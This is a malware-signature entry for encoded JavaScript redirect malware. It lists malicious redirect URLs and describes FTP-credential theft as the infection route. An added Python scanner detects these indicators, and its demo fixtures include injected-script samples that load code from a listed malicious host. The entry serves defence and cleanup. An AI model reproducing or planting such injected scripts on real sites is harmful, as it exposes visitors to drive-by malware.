
Malware entry: MW:JS:150

Description: This encoded JavaScript malware redirects the user to several domains, including:
http://breadcells.ru:8080/google.com/live.com/xunlei.com.php
http://icychina.ru:8080/google.com/mercadolibre.com.mx/google.com.ua.php
http://helphomecare.at:8080/google.com/download.com/qip.ru.php
http://passportblues.ru:8080/amazon-fr/google.com/miibeian.gov.cn.php
http://passportblues.ru:8080/google.com/bharatstudent.com/guardian.co.uk.php
http://dirtysin.ru:8080/wretch-cc/google.com/filestube.com.php
http://onelead.ru:8080/google.com/tube8.com/cncmax.cn.php
http://ourdope.ru:8080/google.com/friendster.com/37wan.com.php
http://beautyschooldropouts.com/wp-includes/wp-rss2.php
http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php
http://wap.northernplumbingandheating.com/assets/postinfo.php
http://paipai-com.cbssports.com.adbrite-com.clearsitedesign.ru:8080
http://sogpaoiy.the-mlmpowercall.com/USB.js

It uses multiple directory names taken from well-known sites (google, mercadolibre, etc.) in the URL path to make the redirect look legitimate to the user.

Affecting: The malware infects the web site through a compromised (virus-infected) desktop: the virus steals any passwords stored in the FTP client and uses them to log in to the sites and inject the code.

Clean up: The desktop must be cleaned first. Use multiple AVs if necessary, since this virus is very good at hiding from whatever AV is currently running. Once the desktop is clean, clean up the sites and change the FTP passwords; changing them before the desktop is clean only hands the new passwords to the virus.
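A scanner for the site-side cleanup step, as an added example (it is not Sucuri's own tool and not part of this entry): it walks a web root, unwraps %xx and \xNN string escapes so an indicator hidden inside an encoded script still surfaces, and flags any file that contains one of the hosts listed above or a URL of the same shape (host:8080/<lookalike dir>/<lookalike dir>/<name>.php), which generalizes beyond the exact URLs in the list. The host list and the URL shape come from the description; the escape-unwrapping step is an assumption, since the encoded sample itself is not reproduced here, and the three files in demo() are constructed inputs.

```python
"""Scan a web root for MW:JS:150 redirect indicators (added example, not Sucuri's code)."""
import re
import tempfile
from pathlib import Path

# Hosts taken from the redirect URLs in the entry above.
KNOWN_HOSTS = (
    "breadcells.ru", "icychina.ru", "helphomecare.at", "passportblues.ru",
    "dirtysin.ru", "onelead.ru", "ourdope.ru",
    "beautyschooldropouts.com", "salsafestival-berlin.de",
    "wap.northernplumbingandheating.com",
    "paipai-com.cbssports.com.adbrite-com.clearsitedesign.ru",
    "sogpaoiy.the-mlmpowercall.com",
)
HOST_RE = re.compile(
    r"(?<![a-z0-9.-])(?:" + "|".join(re.escape(h) for h in KNOWN_HOSTS) + r")(?![a-z0-9.-])",
    re.IGNORECASE,
)
# Shape of the redirect URLs: http://<host>:8080/<dir>/<dir>/<name>.php where the
# directories are named after well-known sites; matches new hosts of the same family.
SHAPE_RE = re.compile(
    r"https?://[a-z0-9.-]+:8080/(?:[a-z0-9.-]+/)+[a-z0-9.-]+\.php", re.IGNORECASE
)
# Assumption: the encoding is plain %xx / \xNN string escaping, possibly layered.
PCT_RE = re.compile(r"%([0-9a-f]{2})", re.IGNORECASE)
HEX_RE = re.compile(r"\\x([0-9a-f]{2})", re.IGNORECASE)


def unescape_layers(text, max_rounds=3):
    """Undo %xx and \\xNN escapes repeatedly until the text stops changing."""
    for _ in range(max_rounds):
        new = PCT_RE.sub(lambda m: chr(int(m.group(1), 16)), text)
        new = HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), new)
        if new == text:
            break
        text = new
    return text


def find_indicators(text):
    """Return unique (kind, matched_text) pairs found in the de-escaped text."""
    decoded = unescape_layers(text)
    hits, seen = [], set()
    for kind, rx in (("known-host", HOST_RE), ("redirect-shape", SHAPE_RE)):
        for m in rx.finditer(decoded):
            key = (kind, m.group(0))
            if key not in seen:
                seen.add(key)
                hits.append(key)
    return hits


def scan_tree(root, suffixes=(".php", ".js", ".html", ".htm")):
    """Map relative file path -> indicator list for every flagged file under root."""
    root = Path(root)
    results = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in suffixes:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        hits = find_indicators(text)
        if hits:
            results[path.relative_to(root).as_posix()] = hits
    return results


def demo():
    """Run the scanner over three constructed files (not real site content)."""
    samples = {
        # percent-encoded script tag pointing at a listed redirect URL
        "infected.js": 'document.write(unescape("%3Cscript%20src%3D%22http%3A%2F%2F'
                       'breadcells.ru%3A8080%2Fgoogle.com%2Flive.com%2Fxunlei.com.php'
                       '%22%3E%3C%2Fscript%3E"));',
        # hex-escaped host, rest of the URL appended in the clear
        "wp-content/themes/footer.php":
            r'<script>var u = "\x68\x74\x74\x70\x3a\x2f\x2f\x6f\x6e\x65\x6c\x65\x61\x64'
            r'\x2e\x72\x75" + ":8080/google.com/tube8.com/cncmax.cn.php";</script>',
        # clean file with an ordinary link, must not be flagged
        "clean.php": '<?php echo "<a href=\\"http://google.com/\\">search</a>"; ?>',
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in samples.items():
            p = Path(tmp) / name
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body)
        return scan_tree(tmp)


if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        for kind, match in hits:
            print(f"{path}: {kind}: {match}")
```

Run it against the document root after the desktop is clean; a hit on "redirect-shape" without a "known-host" hit means a host not in the list above and is worth reporting. Files modified after the last known-good deploy are the first place to look, and any match should be diffed against a clean copy rather than edited in place.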

Malware dump:





For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb